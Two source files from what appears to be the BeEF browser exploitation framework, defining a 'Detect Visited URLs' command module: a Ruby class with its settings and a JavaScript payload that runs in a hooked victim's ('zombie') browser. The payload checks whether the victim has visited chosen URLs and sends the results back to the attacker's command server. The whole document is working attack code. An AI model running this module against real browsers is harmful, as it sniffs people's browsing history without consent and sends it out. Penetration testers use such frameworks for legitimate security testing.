File: modules/commands/browser/detect_visited_urls/detect_visited_urls.rb
module BeEF
module Modules
module Commands

class Detect_visited_urls < BeEF::Command
  
  def initialize
    super({
      'Name' => 'Detect Visited URLs',
      'Description' => 'This module will detect whether or not the zombie has visited the specifed URL(s) before.',
      'Category' => 'Browser',
      'Author' => ['passbe'],
      'Data' => [
        ['ui_label'=>'URL(s)', 'name'=>'urls', 'type'=>'textarea', 'value'=>'http://www.bindshell.net/', 'width'=>'200px']
      ],
      'File' => __FILE__,
      'Target' => {
        'browser_name' =>     BeEF::Constants::Browsers::ALL
      }
    })    
              
    use_template!
  end

  def callback
    save({'result' => @datastore['result']})
  end
  
end

end
end
end

File: modules/commands/browser/detect_visited_urls/detect_visited_urls.js
beef.execute(function() {
	var results = beef.browser.hasVisited("<%== format_multiline(@urls) %>");
	var comp = '';
	for (var i=0; i < results.length; i++)
	{
		comp += results[i].url+' = '+results[i].visited+'  ';
	}
	beef.net.send("<%= @command_url %>", <%= @command_id %>, comp);
});

